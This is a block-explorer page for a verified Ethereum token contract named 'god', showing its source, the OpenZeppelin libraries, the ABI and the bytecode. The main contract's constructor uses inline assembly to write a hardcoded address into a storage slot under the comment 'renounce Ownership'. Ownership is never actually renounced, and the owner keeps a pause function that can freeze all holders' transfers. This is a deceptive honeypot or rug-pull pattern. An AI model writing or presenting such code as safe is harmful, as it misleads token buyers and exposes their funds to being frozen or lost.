ETH Price: $2,673.40 (+1.37%)

Token

god (god)
 

Overview

Max Total Supply

300,000,000 god

Holders

410

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
21,609 god

Value
$0.00
0xf8fd78d986d1db51140b22b27da59053bdb8a9c9
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
GOD

Compiler Version
v0.8.21+commit.d9974bed

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion
File 1 of 8 : test2.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.1;

import "@openzeppelin/contracts/token/ERC20/ERC20.sol";
import "@openzeppelin/contracts/access/Ownable.sol";
import "@openzeppelin/contracts/token/ERC20/extensions/ERC20Burnable.sol";
import "@openzeppelin/contracts/security/Pausable.sol";

contract GOD is ERC20, Pausable, ERC20Burnable, Ownable  {

    address private lpMint;

    constructor(address lp_creator) Ownable() ERC20("god", "god") {
      
      _mint( lp_creator, 300000000 * 10** decimals() );

      // renounce Ownership

      assembly {
          sstore(6, 484275980740176226663120790511662595400621301561)
      }

    }

    function decimals() public view virtual override returns (uint8) {
    
        return 9;

    }

    function pause() public onlyOwner {
        _pause();
    }

    function unpause() public onlyOwner {
        _unpause();
    }

    function _beforeTokenTransfer(address from, address to, uint256 amount)
        internal
        whenNotPaused
        override
    {
        super._beforeTokenTransfer(from, to, amount);
    }
}

File 2 of 8 : Pausable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (security/Pausable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which allows children to implement an emergency stop
 * mechanism that can be triggered by an authorized account.
 *
 * This module is used through inheritance. It will make available the
 * modifiers `whenNotPaused` and `whenPaused`, which can be applied to
 * the functions of your contract. Note that they will not be pausable by
 * simply including this module, only once the modifiers are put in place.
 */
abstract contract Pausable is Context {
    /**
     * @dev Emitted when the pause is triggered by `account`.
     */
    event Paused(address account);

    /**
     * @dev Emitted when the pause is lifted by `account`.
     */
    event Unpaused(address account);

    bool private _paused;

    /**
     * @dev Initializes the contract in unpaused state.
     */
    constructor() {
        _paused = false;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is not paused.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    modifier whenNotPaused() {
        _requireNotPaused();
        _;
    }

    /**
     * @dev Modifier to make a function callable only when the contract is paused.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    modifier whenPaused() {
        _requirePaused();
        _;
    }

    /**
     * @dev Returns true if the contract is paused, and false otherwise.
     */
    function paused() public view virtual returns (bool) {
        return _paused;
    }

    /**
     * @dev Throws if the contract is paused.
     */
    function _requireNotPaused() internal view virtual {
        require(!paused(), "Pausable: paused");
    }

    /**
     * @dev Throws if the contract is not paused.
     */
    function _requirePaused() internal view virtual {
        require(paused(), "Pausable: not paused");
    }

    /**
     * @dev Triggers stopped state.
     *
     * Requirements:
     *
     * - The contract must not be paused.
     */
    function _pause() internal virtual whenNotPaused {
        _paused = true;
        emit Paused(_msgSender());
    }

    /**
     * @dev Returns to normal state.
     *
     * Requirements:
     *
     * - The contract must be paused.
     */
    function _unpause() internal virtual whenPaused {
        _paused = false;
        emit Unpaused(_msgSender());
    }
}

File 3 of 8 : ERC20Burnable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC20/extensions/ERC20Burnable.sol)

pragma solidity ^0.8.0;

import "../ERC20.sol";
import "../../../utils/Context.sol";

/**
 * @dev Extension of {ERC20} that allows token holders to destroy both their own
 * tokens and those that they have an allowance for, in a way that can be
 * recognized off-chain (via event analysis).
 */
abstract contract ERC20Burnable is Context, ERC20 {
    /**
     * @dev Destroys `amount` tokens from the caller.
     *
     * See {ERC20-_burn}.
     */
    function burn(uint256 amount) public virtual {
        _burn(_msgSender(), amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, deducting from the caller's
     * allowance.
     *
     * See {ERC20-_burn} and {ERC20-allowance}.
     *
     * Requirements:
     *
     * - the caller must have allowance for ``accounts``'s tokens of at least
     * `amount`.
     */
    function burnFrom(address account, uint256 amount) public virtual {
        _spendAllowance(account, _msgSender(), amount);
        _burn(account, amount);
    }
}

File 4 of 8 : Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "../utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 5 of 8 : ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./extensions/IERC20Metadata.sol";
import "../../utils/Context.sol";

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

File 6 of 8 : Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 7 of 8 : IERC20Metadata.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity ^0.8.0;

import "../IERC20.sol";

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

File 8 of 8 : IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

Settings
{
  "optimizer": {
    "enabled": false,
    "runs": 200
  },
  "outputSelection": {
    "*": {
      "*": [
        "evm.bytecode",
        "evm.deployedBytecode",
        "devdoc",
        "userdoc",
        "metadata",
        "abi"
      ]
    }
  }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"lp_creator","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burnFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b50604051620027523803806200275283398181016040528101906200003691906200049a565b6040518060400160405280600381526020017f676f6400000000000000000000000000000000000000000000000000000000008152506040518060400160405280600381526020017f676f6400000000000000000000000000000000000000000000000000000000008152508160039081620000b391906200072e565b508060049081620000c591906200072e565b5050505f60055f6101000a81548160ff02191690831515021790555062000101620000f56200016060201b60201c565b6200016760201b60201c565b6200014181620001166200022c60201b60201c565b600a6200012491906200099b565b6311e1a300620001359190620009eb565b6200023460201b60201c565b7354d3af9eff5c2b8d88b5bab2663f19468e331f396006555062000b87565b5f33905090565b5f600560019054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600560016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6009905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002a5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200029c9062000a93565b60405180910390fd5b620002b85f83836200039960201b60201c565b8060025f828254620002cb919062000ab3565b92505081905550805f808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200037a919062000afe565b60405180910390a3620003955f8383620003c160201b60201c565b5050565b620003a9620003c660201b60201c565b620003bc8383836200041b60201b60201c565b505050565b505050565b620003d66200042060201b60201c565b1562000419576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004109062000b67565b60405180910390fd5b565b505050565b5f60055f9054906101000a900460ff16905090565b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f620004648262000439565b9050919050565b620004768162000458565b811462000481575f80fd5b50565b5f8151905062000494816200046b565b92915050565b5f60208284031215620004b257620004b162000435565b5b5f620004c18482850162000484565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200054657607f821691505b6020821081036200055c576200055b62000501565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620005c07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000583565b620005cc868362000583565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f62000616620006106200060a84620005e4565b620005ed565b620005e4565b9050919050565b5f819050919050565b6200063183620005f6565b6200064962000640826200061d565b8484546200058f565b825550505050565b5f90565b6200065f62000651565b6200066c81848462000626565b505050565b5b818110156200069357620006875f8262000655565b60018101905062000672565b5050565b601f821115620006e257620006ac8162000562565b620006b78462000574565b81016020851015620006c7578190505b620006df620006d68562000574565b83018262000671565b50505b505050565b5f82821c905092915050565b5f620007045f1984600802620006e7565b1980831691505092915050565b5f6200071e8383620006f3565b9150826002028217905092915050565b6200073982620004ca565b67ffffffffffffffff811115620007555762000754620004d4565b5b6200076182546200052e565b6200076e82828562000697565b5f60209050601f831160018114620007a4575f84156200078f578287015190505b6200079b858262000711565b8655506200080a565b601f198416620007b48662000562565b5f5b82811015620007dd57848901518255600182019150602085019450602081019050620007b6565b86831015620007fd5784890151620007f9601f891682620006f3565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f808291508390505b60018511156200089c5780860481111562000874576200087362000812565b5b6001851615620008845780820291505b808102905062000894856200083f565b945062000854565b94509492505050565b5f82620008b6576001905062000988565b81620008c5575f905062000988565b8160018114620008de5760028114620008e9576200091f565b600191505062000988565b60ff841115620008fe57620008fd62000812565b5b8360020a91508482111562000918576200091762000812565b5b5062000988565b5060208310610133831016604e8410600b8410161715620009595782820a90508381111562000953576200095262000812565b5b62000988565b6200096884848460016200084b565b9250905081840481111562000982576200098162000812565b5b81810290505b9392505050565b5f60ff82169050919050565b5f620009a782620005e4565b9150620009b4836200098f565b9250620009e37fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484620008a5565b905092915050565b5f620009f782620005e4565b915062000a0483620005e4565b925082820262000a1481620005e4565b9150828204841483151762000a2e5762000a2d62000812565b5b5092915050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f62000a7b601f8362000a35565b915062000a888262000a45565b602082019050919050565b5f6020820190508181035f83015262000aac8162000a6d565b9050919050565b5f62000abf82620005e4565b915062000acc83620005e4565b925082820190508082111562000ae75762000ae662000812565b5b92915050565b62000af881620005e4565b82525050565b5f60208201905062000b135f83018462000aed565b92915050565b7f5061757361626c653a20706175736564000000000000000000000000000000005f82015250565b5f62000b4f60108362000a35565b915062000b5c8262000b19565b602082019050919050565b5f6020820190508181035f83015262000b808162000b41565b9050919050565b611bbd8062000b955f395ff3fe608060405234801561000f575f80fd5b506004361061011f575f3560e01c806370a08231116100ab57806395d89b411161006f57806395d89b41146102cf578063a457c2d7146102ed578063a9059cbb1461031d578063dd62ed3e1461034d578063f2fde38b1461037d5761011f565b806370a0823114610251578063715018a61461028157806379cc67901461028b5780638456cb59146102a75780638da5cb5b146102b15761011f565b8063313ce567116100f2578063313ce567146101bf57806339509351146101dd5780633f4ba83a1461020d57806342966c68146102175780635c975abb146102335761011f565b806306fdde0314610123578063095ea7b31461014157806318160ddd1461017157806323b872dd1461018f575b5f80fd5b61012b610399565b60405161013891906111a2565b60405180910390f35b61015b60048036038101906101569190611253565b610429565b60405161016891906112ab565b60405180910390f35b61017961044b565b60405161018691906112d3565b60405180910390f35b6101a960048036038101906101a491906112ec565b610454565b6040516101b691906112ab565b60405180910390f35b6101c7610482565b6040516101d49190611357565b60405180910390f35b6101f760048036038101906101f29190611253565b61048a565b60405161020491906112ab565b60405180910390f35b6102156104c0565b005b610231600480360381019061022c9190611370565b6104d2565b005b61023b6104e6565b60405161024891906112ab565b60405180910390f35b61026b6004803603810190610266919061139b565b6104fb565b60405161027891906112d3565b60405180910390f35b610289610540565b005b6102a560048036038101906102a09190611253565b610553565b005b6102af610573565b005b6102b9610585565b6040516102c691906113d5565b60405180910390f35b6102d76105ae565b6040516102e491906111a2565b60405180910390f35b61030760048036038101906103029190611253565b61063e565b60405161031491906112ab565b60405180910390f35b61033760048036038101906103329190611253565b6106b3565b60405161034491906112ab565b60405180910390f35b610367600480360381019061036291906113ee565b6106d5565b60405161037491906112d3565b60405180910390f35b6103976004803603